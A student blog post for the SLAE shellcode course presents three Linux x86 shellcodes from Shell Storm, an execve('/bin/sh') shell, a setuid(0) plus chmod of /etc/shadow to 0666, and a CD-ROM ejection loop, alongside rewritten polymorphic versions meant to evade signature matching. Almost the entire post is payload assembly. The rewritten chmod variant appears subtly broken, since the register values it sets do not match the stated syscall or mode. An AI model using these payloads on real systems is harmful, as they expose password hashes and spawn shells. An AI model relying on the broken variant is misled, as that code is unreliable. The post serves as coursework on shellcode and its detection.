SLAE – Assignment #6: Polymorphic Shellcode
Posted by: voidsec
Post Date: April 2, 2020
Reading Time: 3 minutes
Table of Contents
Assignment #6: Polymorphic Shellcode
Sixth SLAE’s assignment requires to create three different (polymorphic) shellcodes version starting from published Shell Storm’s examples.
I’ve decided to take this three in exam:
- http://shell-storm.org/shellcode/files/shellcode-752.php – linux/x86 execve (“/bin/sh”) – 21 bytes
- http://shell-storm.org/shellcode/files/shellcode-624.php – linux/x86 setuid(0) + chmod(“/etc/shadow”,0666) – 37 bytes
- http://shell-storm.org/shellcode/files/shellcode-231.php – linux/x86 open cd-rom loop (follows “/dev/cdrom” symlink) – 39 bytes
As always, all the code is also available on GitHub.
Stay updated, join VoidSec’s Telegram Channel: https://t.me/voidsec_updates
execve (“/bin/sh”)
Original:
; http://shell-storm.org/shellcode/files/shellcode-752.php xor ecx, ecx mul ecx push ecx push 0x68732f2f ;; hs// push 0x6e69622f ;; nib/ mov ebx, esp mov al, 11 int 0x80
Polymorphic:
; Paolo Stagno aka [VoidSec](https://voidsec.com) ; SLAE-1511 ; mul: multiply eax value with arg (ecx), result stored in eax,edx xor ecx, ecx mul ecx push eax mov edi, 0x68732f2f mov esi, 0x6e69622f push edi push esi mov ebx, esp mov al, 0xb int 0x80
Diff:
- original size: 21 bytes
- polymorphic size: 23 bytes [OK] (max size: 31.5 bytes)
- +9.52%
setuid(0) + chmod(“/etc/shadow”,0666)
Original:
; http://shell-storm.org/shellcode/files/shellcode-624.php xor ebx, ebx mov al, 0x17 int 0x80 xor eax,eax push eax push 0x776f6461 push 0x68732f63 push 0x74652f2f mov ebx, esp mov cx, 0x1b6 mov al, 0xf int 0x80 inc eax int 0x80
Polymorphic:
; Paolo Stagno aka [VoidSec](https://voidsec.com) ; SLAE-1511 xor ebx, ebx push 0x17 pop eax int 0x80 xor eax,eax push eax mov eax, 0x776f6461 push eax mov eax, 0x68732f63 push eax mov eax, 0x74652f2f push eax mov ebx, esp mov ecx, -219 add ecx, -219 mov eax, 0xffffffff int 0x80 inc eax int 0x80
Diff:
- original size: 37 bytes
- polymorphic size: 51 bytes [OK] (max size: 55.5 bytes)
- +37.83%
open cd-rom loop (follows “/dev/cdrom” symlink)
Original:
; http://shell-storm.org/shellcode/files/shellcode-231.php push 0x5 pop eax xor ecx,ecx push ecx mov ch, 0x8 push 0x6d6f7264 push 0x632f7665 push 0x642f2f2f mov ebx, esp int 0x80 mov ebx, eax mov cx, 0x5309 openit: mov al, 0x36 int 0x80 jmp openit
Polymorphic:
; Paolo Stagno aka [VoidSec](https://voidsec.com) ; SLAE-1511 push 0x5 pop eax xor ecx,ecx push ecx mov ch, 0x8 mov edi, 0x6d6f7264 push edi mov edi, 0x632f7665 push edi mov edi, 0x642f2f2f push edi mov ebx, esp int 0x80 xchg eax, ebx mov cx, 0x5309 openit: push 0x36 pop eax int 0x80 jmp openit
Diff:
- original size: 39 bytes
- polymorphic size: 42 bytes [OK] (max size: 58.5 bytes)
- +7.69%
SLAE Exam Statement
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.
Student ID: SLAE-1511